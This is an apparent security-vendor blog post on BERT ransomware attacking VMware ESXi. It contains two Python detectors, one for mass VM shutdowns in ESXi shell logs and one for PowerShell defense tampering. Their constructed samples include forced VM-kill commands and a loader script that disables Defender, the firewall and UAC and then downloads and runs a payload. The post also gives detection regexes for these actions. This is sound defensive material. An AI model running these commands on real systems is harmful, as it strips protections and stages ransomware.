BERT Ransomware Threatens ESXi Virtual Machine

BERT is a newly observed ransomware family that has recently been used in attacks on virtualization platforms such as VMware ESXi in businesses. Because encrypting a hypervisor's datastore takes down every virtual machine hosted on it at once, these attacks cause significant damage to the affected organizations and severely hinder system recovery.

Detailed Information

BERT ransomware, whose operators are tracked as "Water Pombero", emerged in April 2025. The group primarily targets the virtualization systems, databases, and storage servers of organizations in the healthcare, technology, and events sectors across Asia, Europe, and the Americas.

According to the latest reporting, the Linux version of the ransomware has gained new mechanisms that make it considerably more dangerous. Specifically, it can detect the virtual machines running on a compromised ESXi host and forcibly shut them down before encrypting their data. Stopping the VMs first serves two purposes: a running VM holds locks on its disk files, so killing it is what lets the encryptor overwrite them, and the targeted systems are down for the duration of the attack, which leaves administrators nothing to respond from inside the affected guests.

Figure 1: Malware executing commands to force virtual machines in the system to stop operating - Source: CyberSecurityNews
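The behaviour in Figure 1 leaves a trace on the host itself, which is the natural place to detect it. The following is an added example written for this article, not code from the original post or from the malware: it scans an ESXi host's shell log for bursts of forced VM stops coming from one shell session. It assumes the log keeps ESXi's default `/var/log/shell.log` format and that the attacker used the host's standard `esxcli vm process kill` / `vim-cmd vmsvc/power.off` commands to stop the VMs; the article does not quote BERT's exact command line, so those patterns are an assumption, and the sample log lines are constructed.

```python
"""Flag bursts of forced VM shutdowns in an ESXi host's shell log.

Added example for this article; it is not code from the original post or
from the malware. ESXi records interactive shell commands in
/var/log/shell.log, and the sample below is constructed to mimic that
format. The matched commands (esxcli vm process kill, vim-cmd vmsvc/power.off)
are ESXi's standard ways of stopping a VM; the article does not state the
exact command line BERT uses, so the patterns are an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/shell.log lines (not real telemetry).
SAMPLE_SHELL_LOG = """\
2025-06-10T09:58:01Z shell[2098111]: [root]: esxcli system version get
2025-06-10T10:02:14Z shell[2098111]: [root]: esxcli vm process list
2025-06-10T10:02:19Z shell[2098111]: [root]: esxcli vm process kill --type=force --world-id=2101001
2025-06-10T10:02:20Z shell[2098111]: [root]: esxcli vm process kill --type=force --world-id=2101002
2025-06-10T10:02:21Z shell[2098111]: [root]: esxcli vm process kill --type=force --world-id=2101003
2025-06-10T10:02:22Z shell[2098111]: [root]: vim-cmd vmsvc/power.off 7
2025-06-10T10:03:05Z shell[2098111]: [root]: chmod +x /tmp/encryptor
2025-06-11T14:00:00Z shell[2105555]: [root]: esxcli vm process kill --type=soft --world-id=2101009
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$"
)
# Only forced stops: a soft kill asks the guest to shut down; force/hard
# terminate the VM immediately and release the locks on its disk files.
STOP_RE = re.compile(
    r"esxcli vm process kill\b.*--type[= ](force|hard)\b|vim-cmd vmsvc/power\.off\b",
    re.IGNORECASE,
)


def parse_shell_log(log_text):
    """Yield (timestamp, shell_pid, user, command) for each well-formed line."""
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
            yield ts, m["pid"], m["user"], m["cmd"]


def find_mass_shutdowns(log_text, window=timedelta(seconds=60), threshold=3):
    """Return one alert per shell session that force-stops at least
    `threshold` VMs within `window`, as (shell_pid, user, first_ts, commands).

    A single forced kill is routine administration; several in quick
    succession from one session is the pre-encryption pattern described above.
    """
    per_session = defaultdict(list)
    for ts, pid, user, cmd in parse_shell_log(log_text):
        if STOP_RE.search(cmd):
            per_session[(pid, user)].append((ts, cmd))

    alerts = []
    for (pid, user), events in per_session.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            burst = [cmd for ts, cmd in events[i:] if ts - start <= window]
            if len(burst) >= threshold:
                alerts.append((pid, user, start, burst))
                break  # one alert per session is enough
    return alerts


if __name__ == "__main__":
    for pid, user, start, cmds in find_mass_shutdowns(SAMPLE_SHELL_LOG):
        print(f"[{start.isoformat()}] shell pid {pid} ({user}) stopped {len(cmds)} VMs:")
        for c in cmds:
            print("   ", c)
```

Run it against a copy of `/var/log/shell.log` collected from the host (or the same lines forwarded to a central syslog). The single soft kill on the second day is deliberately ignored: the threshold and window are what separate an administrator stopping one stuck VM from a session that takes down several in the same minute and then stages a binary.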

Beyond running on Windows, Linux, and ESXi, BERT can use up to 50 encryption threads in parallel, which speeds up encryption considerably in large virtualization environments where the targets are many large virtual disk files.

On Windows, BERT uses a PowerShell script as a loader. The script disables built-in protections such as Microsoft Defender, the Windows Firewall, and User Account Control (UAC) before downloading the main payload from the attackers' command-and-control (C2) server, so the encryptor itself only ever runs on a host whose defenses are already off.

Figure 2: Malware PowerShell script disabling default security features on Windows - Source: CyberSecurityNews
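The staged loader in Figure 2 is what the PowerShell monitoring recommended below is meant to catch: several protections switched off in one script, followed by a download. Here is an added example written for this article, not code from the original post or from the malware, that classifies PowerShell script blocks on exactly that pattern. It takes the ScriptBlockText of a Script Block Logging event (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which must be enabled) as plain text; the regexes cover the common ways of disabling Defender, the firewall, and UAC and of fetching a payload, not BERT's exact script, which the article does not quote, and the four sample blocks are constructed.

```python
"""Classify PowerShell script blocks for the defence-disabling loader pattern.

Added example for this article, not code from the original post or from the
malware. Input is the ScriptBlockText of a PowerShell Script Block Logging
event (Event ID 4104 in Microsoft-Windows-PowerShell/Operational); the four
script blocks below are constructed. The regexes cover the common ways of
switching off Defender, the Windows Firewall and UAC and of fetching a
payload; they are not BERT's exact script, which the article does not quote.
"""
import re

FLAGS = re.IGNORECASE | re.MULTILINE

# Each rule names one protection the loader has to remove.
DEFENSE_TAMPER_RULES = {
    "defender_off": re.compile(
        r"Set-MpPreference\b[^\n]*-Disable\w+\s+\$?true"      # real-time, IOAV, behaviour monitoring...
        r"|Add-MpPreference\b[^\n]*-ExclusionPath"            # exclude the drop directory from scanning
        r"|DisableAntiSpyware\b[^\n]*\b1\b",                  # registry kill switch
        FLAGS),
    "firewall_off": re.compile(
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"
        r"|Set-NetFirewallProfile\b[^\n]*-Enabled\s+\$?false",
        FLAGS),
    "uac_off": re.compile(
        r"EnableLUA\b[^\n]*(?:/d\s+0\b|-Value\s+0\b)",         # reg add ... /d 0 or Set-ItemProperty -Value 0
        FLAGS),
}
# Fetching the second stage from a remote host.
DOWNLOAD_RULE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile"
    r"|Start-BitsTransfer|certutil(\.exe)?\b[^\n]*-urlcache",
    FLAGS)


def classify_script_block(text):
    """Return {'verdict', 'tampered', 'downloads'} for one script block.

    'loader' : two or more protections disabled and a download in the same
               block, the staged pattern the article describes.
    'tamper' : at least one protection disabled; worth a look on its own.
    'benign' : nothing matched (a plain download is not enough by itself).
    """
    tampered = [name for name, rx in DEFENSE_TAMPER_RULES.items() if rx.search(text)]
    downloads = bool(DOWNLOAD_RULE.search(text))
    if len(tampered) >= 2 and downloads:
        verdict = "loader"
    elif tampered:
        verdict = "tamper"
    else:
        verdict = "benign"
    return {"verdict": verdict, "tampered": tampered, "downloads": downloads}


# Constructed script blocks; 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_BLOCKS = {
    "loader": r"""
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
netsh advfirewall set allprofiles state off
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Invoke-WebRequest -Uri http://203.0.113.10/update.bin -OutFile $env:TEMP\update.exe
Start-Process $env:TEMP\update.exe
""",
    "admin_download": r"""
Invoke-WebRequest -Uri https://intranet.example/tools/agent.zip -OutFile C:\Tools\agent.zip
Expand-Archive C:\Tools\agent.zip -DestinationPath C:\Tools\agent
""",
    "single_tamper": r"""
Set-MpPreference -DisableRealtimeMonitoring $true
""",
    "routine_admin": r"""
Set-MpPreference -ScanScheduleDay 1
Get-NetFirewallProfile | Format-Table Name, Enabled
""",
}


def classify_samples():
    """Verdict for each constructed sample, keyed by sample name."""
    return {name: classify_script_block(text)["verdict"] for name, text in SAMPLE_BLOCKS.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:15} -> {verdict}")
```

The point of requiring both tampering and a download before calling a block a loader is to keep the false-positive rate tolerable: a lone `Invoke-WebRequest` is everyday administration, and even a single `Set-MpPreference -Disable...` can be a technician troubleshooting. The combination inside one script block is what the loader described above has to do and what legitimate scripts almost never do. Because the loader runs before the payload is fetched, an alert here arrives while there is still something to stop.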

Mitigation & Recommendations

  1. Advanced PowerShell monitoring: enable PowerShell Script Block Logging and alert on scripts that disable the Windows Firewall, Microsoft Defender, or UAC, so the loader is caught before it fetches the payload.

  2. Network segmentation: place the ESXi management interface on an isolated management network reachable only from dedicated administration hosts, so that a server compromised elsewhere on the network cannot reach the hypervisor.

  3. Strengthen virtualization infrastructure defenses: keep VMware ESXi and the virtual servers patched, leave the ESXi Shell and SSH disabled when they are not in use, and enforce strong, unique credentials on hypervisor accounts.

  4. Data backup: keep offline or immutable backups, including of the virtual machine images themselves, and test restores regularly, so that data the ransomware encrypts or deletes can be recovered.

References

  1. https://cybersecuritynews.com/bert-ransomware-esxi-virtual-machines/

FPT IS Security

761 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.